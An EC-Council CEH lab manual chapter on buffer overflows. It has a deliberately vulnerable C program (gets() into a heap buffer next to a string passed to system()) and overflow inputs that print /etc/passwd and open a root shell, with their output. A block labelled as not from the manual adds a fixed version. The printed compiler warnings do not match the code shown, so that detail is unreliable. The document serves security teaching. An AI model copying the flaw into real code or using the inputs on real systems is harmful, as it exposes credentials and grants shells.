CEH Lab Manual
Buffer Overflow
Module 18
Module 18 - Buffer Overflow

Buffer Overflow Attack

In a buffer overflow, while writing data to a buffer, the buffer's boundary is overrun and adjacent memory is overwritten.
Lab Scenario

Source: http://www.ic.unicamp.br/~stolfi/urna/buffer-oflow

Hackers continuously look for vulnerabilities in software or a computer to break into the system by exploiting these vulnerabilities.
The most common vulnerability often exploited is the buffer overflow attack, where a program failure occurs either in allocating sufficient memory for an input string or in testing whether the length of a string lies within its valid range. A hacker can exploit such a weakness by submitting an extra-long input to the program, designed to cause the program to overflow its allocated input buffer (temporary storage area) and modify the values of nearby variables, cause the program to jump to unintended places, or even replace the program's instructions by arbitrary code.
If the buffer overflow bugs lie in a network service daemon, the attack can be done by directly feeding the poisonous input string to the daemon. If the bug lies in an ordinary system tool or application, with no direct access, the hacker attaches the poisonous string to a document or an email which, once opened, will launch a passive buffer overflow attack. Such attacks are equivalent to a hacker logging into the system with the same user ID and privileges as the compromised program.

Buffer overflow bugs are especially common in C programs, since that language does not provide built-in array bound checking, and uses a final null byte to mark the end of a string, instead of keeping its length in a separate field. To make things worse, C provides many library functions, such as strcat and getline, which copy strings without any bounds-checking.
As an expert ethical hacker and penetration tester, you must have sound knowledge of when and how buffer overflow occurs. You must understand stack-based and heap-based buffer overflows, perform penetration tests for detecting buffer overflows in programs, and take precautions to prevent programs from buffer overflow attacks.
Lab Objectives

The objective of this lab is to help students to learn and perform buffer overflow attacks to execute passwords. In this lab, you need to:
■ Prepare a script to overflow buffer
■ Run the script against an application
■ Perform penetration testing for the application
■ Enumerate a password list

Note: This lab can be demonstrated using BackTrack Virtual Machine.

CEH Lab Manual Page 902
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Lab Environment

■ A computer running with Windows Server 2012 as Host machine
■ A Virtual Machine running with BackTrack 5 R3
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes
Overview of Buffer Overflow

Buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety. Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited.
Lab Tasks

TASK 1
Overview

Recommended labs to assist you in buffer overflow:
■ Enumerating Passwords in "Default Password List"
  o Write a Code
  o Compile the Code
  o Execute the Code
  o Perform Buffer Overflow Attack
  o Obtain Command Shell
Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Buffer Overflow Example

Lab Scenario
In computer security and programming, a buffer overflow, or buffer overrun, vulnerability appears where an application needs to read external information such as a character string, the size of the receiving buffer is relatively small compared to the possible size of the input string, and the application doesn't check the size. The buffer allocated at run-time is placed on a stack, which keeps the information for executing functions, such as local variables, argument variables, and the return address. The overflowing string can alter such information. This also means that an attacker can change the information as he or she wants to. For example, the attacker can inject a series of machine language commands as a string that also leads to the execution of the attack code by changing the return address to the address of the attack code. The ultimate goal is usually to get control of a privileged shell by such methods.
Programming languages commonly associated with buffer overflows include C and C++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not automatically check that data written to an array (the built-in buffer type) is within the boundaries of that array. Bounds checking can prevent buffer overflows.
As a penetration tester, you should be able to implement protection against stack-smashing attacks. You must be aware of all the defensive measures for buffer overflow attacks. You can prevent buffer overflow attacks by implementing run-time checks, address obfuscation, randomizing the location of functions in libc, analyzing static source code, marking the stack as non-executable, and using type-safe languages such as Java, ML, etc.
Lab Objectives

The objective of this lab is to help students to learn and perform buffer overflow to execute passwords. In this lab, you need to:
■ Prepare a script to overflow buffer
■ Run the script against an application
■ Perform penetration testing for the application
■ Enumerate a password list
Lab Environment

Note: This lab can be demonstrated using BackTrack Virtual Machine.

■ A computer running with Windows Server 2012 as Host machine
■ A Virtual Machine running with BackTrack 5 R3
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes
Overview of Buffer Overflow

Buffer overflow takes place when data written to a buffer, because of insufficient bounds checking, corrupts the data values in memory addresses which are adjacent to the allocated buffer. Most often this occurs when copying strings of characters from one buffer to another.
When the following program is compiled and run, it will assign a block of memory 11 bytes long to hold the attacker string. The strcpy function will copy the string "DDDDDDDDDDDDDD" into the attacker string, which will exceed the buffer size of 11 bytes, resulting in buffer overflow.

Buffer Overflow Example Code
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        char Buffer[11] = "AAAAAAAAAA";     /* room for ten characters plus the terminating null */
        strcpy(Buffer, "DDDDDDDDDDDDDD");   /* 14 characters plus null: 15 bytes written into 11 */
        printf("%s\n", Buffer);
        return 0;
    }

[Figure: layout of Buffer at indexes 0 to 12; the ten A's are overwritten by D's that run past the end of the 11-byte array.]
This type of vulnerability is prevalent in UNIX- and NT-based systems.
Lab Tasks

TASK 1
Write a Code

1. Launch your BackTrack 5 R3 Virtual Machine.
2. For bt login, type root and press Enter. Type the password as toor, and press Enter to log in to the BackTrack virtual machine.
F IG U R E 1.1: BackTrack Log in
Note: Buffer overflow occurs when a program or process tries to store more data in a buffer.

3. Type startx to launch the GUI.
F IG U R E 1.2: BackTrack G U I Login-Startx Comm and
4. The BackTrack 5 R3 GUI desktop opens, as shown in the following screenshot.

Note: Code which is entered in gedit is case-sensitive.
F IG U R E 1.3: BackTrack 5 R3 Desktop
5. Select the BackTrack Applications menu, and then select Accessories → gedit Text Editor.

Note: Programming languages commonly associated with buffer overflows include C and C++.
F IG U R E 1.4: Launching gedit Text E d itor
6. Enter the following code in gedit Text Editor (Note: the code is case-sensitive).

    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        char *name;
        char *command;
        name = (char *)malloc(10);        /* 10-byte block for the name */
        command = (char *)malloc(128);    /* next block on the heap; handed to system() below */
        printf("address of name is: %lu\n", (unsigned long)(uintptr_t)name);
        printf("address of command is: %lu\n", (unsigned long)(uintptr_t)command);
        printf("Difference between address is: %ld\n",
               (long)((uintptr_t)command - (uintptr_t)name));
        printf("Enter your name:");
        gets(name);        /* no length check: a name longer than 9 bytes runs on into 'command' */
        printf("Hello %s\n", name);
        system(command);   /* whatever now sits in 'command' is run by the shell */
        return 0;
    }
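The same program with the two defects removed, as an added example that is not part of the manual: the name is read with a bounded fgets() instead of gets(), and the string handed to system() is fixed rather than whatever landed in the adjacent heap block (the example checks that block instead of executing it). The constructed input is the manual's own overflow string; NAME_SIZE, COMMAND_SIZE, FIXED_COMMAND, read_name, typed_input and scenario are names chosen here.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_SIZE 10                    /* same malloc(10) as the lab's buffer.c */
#define COMMAND_SIZE 128                /* same malloc(128) */
#define FIXED_COMMAND "echo hello"      /* what buffer.c should hand to system() */

/* Bounded replacement for gets(name): stores at most size-1 characters and
 * discards the rest of an overlong line, so nothing is written past 'name'.
 * Returns 1 if the line was truncated, 0 if it fit, -1 if there was no input. */
int read_name(char *name, size_t size, FILE *in)
{
    if (fgets(name, (int)size, in) == NULL) {
        name[0] = '\0';
        return -1;
    }
    size_t len = strlen(name);
    if (len > 0 && name[len - 1] == '\n') {
        name[len - 1] = '\0';
        return 0;
    }
    int c;                              /* no newline seen: drain the leftover */
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    return 1;
}

/* Turn a constructed "typed" line into a stream so the scenario runs offline. */
static FILE *typed_input(const char *typed)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    fputs(typed, f);
    rewind(f);
    return f;
}

/* buffer.c with the fixes applied. Copies the accepted name into 'name_out'
 * and returns 1 if the adjacent 'command' block was left intact (it is not
 * executed here; the point is that user input can no longer reach it). */
int scenario(const char *typed, char *name_out, size_t name_out_size)
{
    char *name = malloc(NAME_SIZE);
    char *command = malloc(COMMAND_SIZE);
    FILE *in = typed_input(typed);
    int intact = 0;
    if (name == NULL || command == NULL || in == NULL)
        goto out;
    strcpy(command, FIXED_COMMAND);     /* fits: sizeof FIXED_COMMAND <= 128 */
    /* On the lab's glibc this distance is 32, as in the manual (not asserted). */
    printf("Difference between address is: %ld\n",
           (long)((uintptr_t)command - (uintptr_t)name));

    if (read_name(name, NAME_SIZE, in) == 1)
        printf("name truncated to %d characters\n", NAME_SIZE - 1);
    printf("Hello %s\n", name);

    intact = strcmp(command, FIXED_COMMAND) == 0;
    snprintf(name_out, name_out_size, "%s", name);
out:
    if (in != NULL)
        fclose(in);
    free(name);
    free(command);
    return intact;
}

int main(void)
{
    char kept[NAME_SIZE];
    /* The manual's overflow input: 32 filler bytes followed by a command. */
    int ok = scenario("12345678912345678912345678912345cat /etc/passwd\n",
                      kept, sizeof kept);
    printf("command intact: %s, name kept: \"%s\"\n", ok ? "yes" : "no", kept);
    return ok ? 0 : 1;
}
```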
Note: Code is compiled using the following command: gcc buffer.c -o buffer

FIGURE 1.5: Writing code for execution
7. Now save the program as buffer.c by selecting File → Save As → root, or simply click Save, as shown in the following screenshot.

Note: No tool can solve completely the problem of buffer overflow, but they surely can decrease the probability of stack smashing attacks.

TASK 2
Compile the Code

8. Now launch the command terminal and compile the code by running:
gcc buffer.c -o buffer
    root@bt:~# gcc buffer.c -o buffer

Note: The program executes using the following command: ./buffer
F IG U R E 1.7: BackTrack com piling the code
9. If there are any errors, ignore them.

    root@bt:~# gcc buffer.c -o buffer
    buffer.c: In function 'main':
    buffer.c:6: warning: incompatible implicit declaration of built-in function 'malloc'
    buffer.c:8: warning: format '%d' expects type 'int', but argument 2 has type 'char *'
    buffer.c:9: warning: format '%d' expects type 'int', but argument 2 has type 'char *'
    buffer.c:10: warning: format '%d' expects type 'int', but argument 2 has type 'long int'
    /tmp/ccx6Y3vl.o: In function `main':
    buffer.c:(.text+0x90): warning: the `gets' function is dangerous and should not be used.
    root@bt:~#

FIGURE 1.8: BackTrack Error Message Window
TASK 3
Execute the Code

10. To execute the program, type ./buffer

    root@bt:~# ./buffer
    address of name is: 20144144
    address of command is: 20144176
    Difference between address is: 32
    Enter your name:

Note: An executable program on a disk contains a set of binary instructions to be executed by the processor.
F IG U R E 1.9: BackTrack Executing Program
11. Type any name in the Input field and press Enter; here, Jason is used as an example.

    root@bt:~# ./buffer
    address of name is: 20144144
    address of command is: 20144176
    Difference between address is: 32
    Enter your name: Jason

Note: Buffer overflows work by manipulating pointers (including stored addresses).
F IG U R E 1.10: In p u t Field
12. Hello Jason should be printed.

    root@bt:~# ./buffer
    address of name is: 20144144
    address of command is: 20144176
    Difference between address is: 32
    Enter your name: Jason
    Hello Jason
    root@bt:~#
F IG U R E 1.11: H ello Jason
TASK 4
Perform Buffer Overflow Attack

13. Now, overflow the buffer and execute the listed system commands.
14. Run the program again by typing ./buffer.
15. Type 12345678912345678912345678912345cat /etc/passwd in the Input field.
16. You can view a printout of the password file.
    root@bt:~# ./buffer
    address of name is: 17747984
    address of command is: 17748016
    Difference between address is: 32
    Enter your name: 12345678912345678912345678912345cat /etc/passwd
    Hello 12345678912345678912345678912345cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh

Note: Buffer overflow vulnerabilities typically occur in code where a programmer cannot accurately predict buffer overflow behavior.
F IG U R E 1.12: Executing Password
TASK 5
Obtain Command Shell

17. Now, obtain a Command Shell.
18. Run the program again with ./buffer and type 12345678912345678912345678912345/bin/sh in the Input field.

    root@bt:~# ./buffer
    address of name is: 24616976
    address of command is: 24617008
    Difference between address is: 32
    Enter your name: 12345678912345678912345678912345/bin/sh
    Hello 12345678912345678912345678912345/bin/sh
    sh-4.1#
    sh-4.1#
    sh-4.1#

Note: Code scrutiny (writing secure code) is the best possible solution to buffer overflow attacks.
FIGURE 1.13: Executing 12345678912345678912345678912345/bin/sh
19. Type Exit in the Shell Konsole or close the program.
Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

Tool/Utility: Buffer Overflow
Information Collected/Objectives Achieved:
■ Address of name is: 24616976
■ Address of command is: 24617008
■ Difference between address is: 32
■ Enter your name: 12345678912345678912345678912345/bin/sh
■ Hello 12345678912345678912345678912345/bin/sh
■ sh-4.1#
■ sh-4.1#
■ sh-4.1#

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions

1. Evaluate various methods to detect run-time errors under the .NET language.
2. Analyze how to prevent buffer overflow.
3. Evaluate and list the common causes of buffer-overflow.

Internet Connection Required: Yes
Platform Supported: Classroom, iLabs